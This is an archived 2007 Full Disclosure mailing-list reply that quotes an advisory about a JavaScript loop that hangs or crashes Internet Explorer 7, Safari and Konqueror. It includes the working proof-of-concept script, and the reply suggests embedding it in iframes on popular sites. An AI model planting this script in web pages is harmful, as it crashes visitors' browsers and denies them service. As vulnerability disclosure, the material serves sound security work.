Full Disclosure mailing list archives

Re: Internet Explorer Crash

From: Kradorex Xeron <admin () digibase ca>
Date: Wed, 18 Apr 2007 12:31:57 -0400

This also works under Konqueror.

There should be an implimentation on ALL browsers that a loop such large is 
unacceptable and refuse to even run it. There is no viable reason for a 
client-side to run a loop through so many itterations.

This DoS technique could be abused and  iframes with the code could be 
embedded within popular websites, effectively causing a denial of service to 
that specific site.


On Tuesday 17 April 2007 13:09, J. Oquendo wrote:

Product: Internet Explorer Version 7.0.5730.11
Impact: Browser crash possibly more
Author: Jesus Oquendo
echo @infiltrated|sed 's/^/sil/g;s/$/.net/g'


I. BACKGROUND
Why bother? Who doesn't know what Internet Explorer and Microsoft are.

II. DESCRIPTION
IE 7 is vulnerable to a script which causes the browser to hang. The
memory and CPU usage go through the roof. Originally the script caused
(and still causes) Safari and Konqueror to crash.

III SOLUTION
Stop using Microsoft products or deal with a new advisory every other
day.

IV. Proof
http://www.infiltrated.net/stupidInternetExploder.html

V. Code

$ more /stupidInternetExploder.html

<script>

var reg = /(.)*/;

var z = 'Z';
                while (z.length <=
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
9999999999999999999999999999999999999999999999999999999999999999999999999999
9999999
999999999999999999999999999999999999999999999999999999999999999999999999999
999999999999999) z+=z; var boum = reg.exec(z);

</script>

Goodbye


J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net

The happiness of society is the end of government.
John Adams


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Internet Explorer Crash J. Oquendo (Apr 17)
- Re: Internet Explorer Crash Nikolay Kichukov (Apr 17)
  - Re: Internet Explorer Crash Michal Majchrowicz (Apr 17)
- Re: Internet Explorer Crash Troy (Apr 17)
- Re: Internet Explorer Crash Kradorex Xeron (Apr 18)
  - Re: Internet Explorer Crash Valdis . Kletnieks (Apr 18)
    - Re: Internet Explorer Crash Pavel Kankovsky (Apr 21)
    - Re: Internet Explorer Crash cardoso (Apr 21)
- Message not available
  - Re: Internet Explorer Crash Michele Cicciotti (Apr 18)
- <Possible follow-ups>
- Internet Explorer Crash carl hardwick (Apr 17)
  - Re: Internet Explorer Crash 3APA3A (Apr 17)
- Re: Internet Explorer Crash Dr. Neal Krawetz, PhD (Apr 17)